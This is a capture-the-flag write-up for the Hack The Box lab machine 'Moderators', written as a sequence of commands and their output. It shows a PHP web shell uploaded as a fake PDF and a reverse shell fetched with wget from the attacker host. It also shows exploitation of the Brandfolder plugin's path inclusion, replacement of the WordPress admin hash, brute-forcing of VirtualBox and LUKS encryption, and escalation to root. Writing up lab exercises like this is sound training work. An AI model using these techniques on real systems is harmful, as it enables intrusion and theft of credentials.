HTB - Moderators [Hard]
Scanning
> TARGET=10.129.129.9 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Moderators
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)s
cors scan
> corscanner -v -u http://10.129.129.9/
> echo http://10.129.129.9/ | ~/go/bin/ucors
dirsearch
> dirsearch -u http://10.129.129.9/ -x 401,302,403
[19:24:05] 200 - 11KB - /about.php
[19:24:47] 200 - 10KB - /contact.php
[19:24:49] 301 - 310B - /css -> http://10.129.129.9/css/
[19:25:07] 301 - 313B - /images -> http://10.129.129.9/images/
[19:25:07] 200 - 0B - /images/
[19:25:08] 200 - 11KB - /index.php
[19:25:08] 200 - 11KB - /index.php/login/
[19:25:17] 301 - 311B - /logs -> http://10.129.129.9/logs/
[19:25:17] 200 - 0B - /logs/
fuzzing report
- By fuzzing report ids, i found multiple reports
> wfuzz -c -z range,0-9999 -u "http://10.129.129.9/reports.php?report=FUZZ" --hh 7888
- Found several interesting entries
* http://10.129.129.9/reports.php?report=2589
* http://10.129.129.9/reports.php?report=3478
* http://10.129.129.9/reports.php?report=4221
* http://10.129.129.9/reports.php?report=7612
* http://10.129.129.9/reports.php?report=8121
- one of them shows an intersting path, this is the md5sum of the report id
* http://10.129.129.9/reports.php?report=9798
[+] Domain : bethebest101.uk.htb
[+] Vulnerability : Sensitive Information Disclosure
[+] Impact : 3.5/4.0
[+] Disclosed by : Karlos Young
[+] Disclosed on : 11/19/2021
[+] Posted on :
[+] Approved :
[+] Patched : NO
[+] LOGS : logs/e21cece511f43a5cb18d4932429915ed/
e21cece511f43a5cb18d4932429915ed is md5(9798)
> echo -n 9798 | md5sum
- Then, we can use this methdo to find the other valid paths
> wfuzz -c -z range,0-9999,md5 -u "http://10.129.129.9/logs/FUZZ/" --hh 274
000002590: 200 0 L 0 W 0 Ch "743c41a921516b04afde48bb48e28ce6"
000003479: 200 0 L 0 W 0 Ch "b071cfa81605a94ad80cfa2bbc747448"
000004222: 200 0 L 0 W 0 Ch "74d90aafda34e6060f9e8433962d14fd"
000007613: 200 0 L 0 W 0 Ch "ce5d75028d92047a9ec617acb9c34ce6"
000008122: 200 0 L 0 W 0 Ch "afecc60f82be41c1b52f6705ec69e0f1"
000009799: 200 0 L 0 W 0 Ch "e21cece511f43a5cb18d4932429915ed"
- continue path discovery found other usefull folders and files
> dirsearch -u http://10.129.129.9/logs/ -x 404,401,403
[19:44:26] 301 - 315B - /logs/css -> http://10.129.129.9/logs/css/
[19:44:45] 200 - 0B - /logs/index.html
[19:45:37] 301 - 319B - /logs/uploads -> http://10.129.129.9/logs/uploads/
[19:45:37] 200 - 0B - /logs/uploads/
- two files are downloadable, from where we found a new path /logs/report_log_upload.php
> curl -i http://10.129.129.9/logs/ce5d75028d92047a9ec617acb9c34ce6/logs.pdf --output logs.pdf
[06/01/2021] Log file created for report #7612.
[06/01/2021] Report submitted by Shivankar Rumar.
[06/03/2021] Report accepted.
[06/03/2021] LOG file uploaded from /logs/report_log_upload.php
[06/04/2021] Reported to the site administrators.
[06/10/2021] Posting approval sent to the owners.
[06/12/2021] Approval pending......
> curl -i http://10.129.129.9/logs/743c41a921516b04afde48bb48e28ce6/logs.pdf --output logs.pdf
[01/30/2021] Log file created for report #2589.
[01/30/2021] Report submitted by Sharaf Ahamed.
[02/03/2021] Report accepted.
[02/03/2021] LOG file uploaded from /logs/report_log_upload.php
[02/04/2021] Reported to the site administrators.
[02/05/2021] Posting approval sent to the owners.
[02/07/2021] Approval pending......
upload shell
- We can upload pdf files through this form. however, initially, it failed even though i uploaded a valid pdf file.
- later i found that you need to change ensure the content-type is application/pdf and as long as you keep the pdf header as shown below, the file can be uploaded sucessfully.
- http://10.129.129.9/logs/report_log_upload.php
%PDF-1.5
<?php echo system('ls'); ?>
%%EOF
http://10.129.129.9/logs/uploads/logs.pdf.php
There appears to be a filter that disables multiple functions, there is a good tool that can bypass this.
To use, start by generating a shell agent
> python3 weevely.py generate meow meow.pdf.php
- upload the shell agent to the target
- Then, connect to the agent
> python3 weevely.py 'http://10.129.129.9/logs/uploads/meow.pdf.php' meow
- Now, you should be able to issue cmd on the target, but i uploaded a better reverse shell as weevely agent is too slow
> cp /usr/share/webshells/php/php-reverse-shell.php w.php
weevely> wget http://<ip>/w.php
- receive the reverse connection
> python3 -c 'import pty; pty.spawn("/bin/bash")'
PE to lexi
- Enum found a script running as the user lexi
root 827 0.0 0.0 8368 3764 ? Ss Aug04 0:00 /usr/sbin/runuser -u lexi /usr/local/sbin/startup.sh
lexi 861 0.0 0.0 2608 532 ? S Aug04 0:00 _ /bin/sh /usr/local/sbin/startup.sh
lexi 865 0.0 0.7 228360 31616 ? S Aug04 0:14 _ /usr/bin/php -S 127.0.0.1:8080 -t /opt/site.new/
- The site is run at a local port 8080
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
- There is a new site (WP) running on 127.0.0.1:8080, in order to access the site, need to pivot the traffic
- upload chisel to the target
> chisel server -p 8888 --reverse
> /tmp/chisel client <ip>:8888 R:8080:localhost:8080
We can found explore the site at http://moderators.htb:8080
With some enum of the site at /opt/site.new/wp-content/plugins, it leads me to a public exploit against brandfolder
examine the callback.php file, this exploit should work.
> cat /opt/site.new/wp-content/plugins/brandfolder/callback.php
<?php
ini_set('display_errors',1);
ini_set('display_startup_errors',1);
error_reporting(0);
require_once($_REQUEST['wp_abspath'] . 'wp-load.php');
require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/media.php');
require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/file.php');
require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/image.php');
require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/post.php');
- For some reason, creating the directory under /tmp doesn’t work. But /var/www/html/logs/uploads/wp works
> mkdir -p /var/www/html/logs/uploads/wp-admin/includes
echo '<?php ?>' > wp-admin/includes/media.php
echo '<?php ?>' > wp-admin/includes/file.php
echo '<?php ?>' > wp-admin/includes/image.php
echo '<?php ?>' > wp-admin/includes/post.php
> cp /var/www/html/logs/uploads/w.php /var/www/html/logs/uploads/wp/wp-load.php
- browse to http://moderators.htb:8080/wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/ and receive the reverse shell.
- Grab lexi’s id_rsa and get the user flag
pe
- Examine the wp-config.php under /opt/site.new for db credential
> cat /opt/site.new/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpressuser' );
define( 'DB_PASSWORD', 'wordpresspassword123!!' );
define( 'DB_HOST', 'localhost' );
hijack wp admin
- login to the db and found the admin user in wp_users, don’t attempt to crack the password, replace it instead.
> mysql -h localhost -u wordpressuser -D wordpress -p'wordpresspassword123!!'
MariaDB [wordpress]> select * from wp_users;
admin | $P$BXasOiM52pOUIRntJTPVlMoH0ZlntT0
> UPDATE `wp_users` SET `user_pass`='$P$BNMdSXZIJVPFih/nCL/Tm6eT152wQv0' WHERE user_login='admin';
- You can pivot more easily using ssh now (if you prefer)
> ssh -L 8080:localhost:8080 -i lexi.id_rsa lexi@10.129.129.9
PE: john
- login to wp admin and check the password manager plugin: http://moderators.htb:8080/wp-admin/admin.php?page=pms_menu
- Now, since we have john’s ssh key, we can login as john
carl@moderators.htb:Carl@thebest**
vdi cracking
- In /home/john, there is a ~/stuff/VBOX folder where we can find a vbox backup
- Donwload both files and crack the password
> python3 ~/tools/pyvboxdie-cracker/pyvboxdie-cracker.py -v 2019-08-01.vbox -d ~/tools/pyvboxdie-cracker/wordlist.txt
Starting pyvboxdie-cracker...
[*] Encrypted drive found : F:/2019.vdi
[*] KeyStore information...
Algorithm = AES-XTS256-PLAIN64
Hash = PBKDF2-SHA256
Final Hash = 5442057bc804a3a914607decea5574aa7038cdce0d498c7fc434afe8cd5b244f
[*] Starting bruteforce...
2 password tested...
50 password tested...
62 password tested...
[*] Password Found = computer
> python3 virtualbox2hashcat.py --vbox 2019-08-01.vbox
$vbox$0$540000$546291a6074943b096ea80db2ae39d4179de6d1c3f17ea25d62e627abfa7fbcb$16$a386a5432e938f20c8fbc9af460a78c1790c19abd1c51e9c0be724939c9481586180fc4a34135d8481e436d8c132b8f4b9a550de4b248300ba32b18b645865d6$20000$e9608bcdd8c070868859a31c9f1e5e5de98b5ead8c21f25c0c43ee697816e32c$5442057bc804a3a914607decea5574aa7038cdce0d498c7fc434afe8cd5b244f
- install virtualbox on windows
- move 2019.vdi and 2019-08-01.vbox to a folder
- update 2019-08-01.vbox with correct path
- double click 2019-08-01.vbox to import the vm
- open the vm setting
- In harddisk, remove Ubuntu
- in the 2019-08-01.vbox file, remove
<HardDisk uuid="{5999a8f0-e31d-4d4e-937d-173eb6ba8881}" location="Ubuntu.vdi" format="VDI" type="Normal"/>
In disk encryption, un-tick enryption and enter the password
computernow we should have a decrypted disk 2019.vdi
Download a unbuntu iso and use the iso to boot up
In the boot up screen, we can select to try ubuntu
You will find the 2019.vdi disk is still encrypted. Trying to mount it will show error of unknown type luks
> sudo mount /dev/sda /tmp
mount: /tmp: unknown filesystem type 'crypto_LUKS'
- Use this tool to crack it: https://github.com/Diverto/cryptsetup-pwguess/releases/tag/v1.0.0,
bruteforce-luks-static-linux-amd64 - Use the same wordlist from pyvboxdie-cracker
> sudo ./bruteforce-luks-static-linux-amd64 -f wordlist.txt /dev/sda
The password is
abc123mount the 2019.vdi disk open it with the password
abc123in the scripts/all-in-one/distro_update.sh file, there is the password for john
PE: john -> root
- john’s password:
$_THE_best_Sysadmin_Ever_
john@moderators:~/stuff/VBOX$ sudo -l
[sudo] password for john:
Matching Defaults entries for john on moderators:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on moderators:
(root) ALL
john@moderators:~/stuff/VBOX$ sudo su
root@moderators:/home/john/stuff/VBOX# id
uid=0(root) gid=0(root) groups=0(root)
root@moderators:/home/john/stuff/VBOX# cat /root/root.txt
bcf0fec9b0aaf3afe31c19782c71897b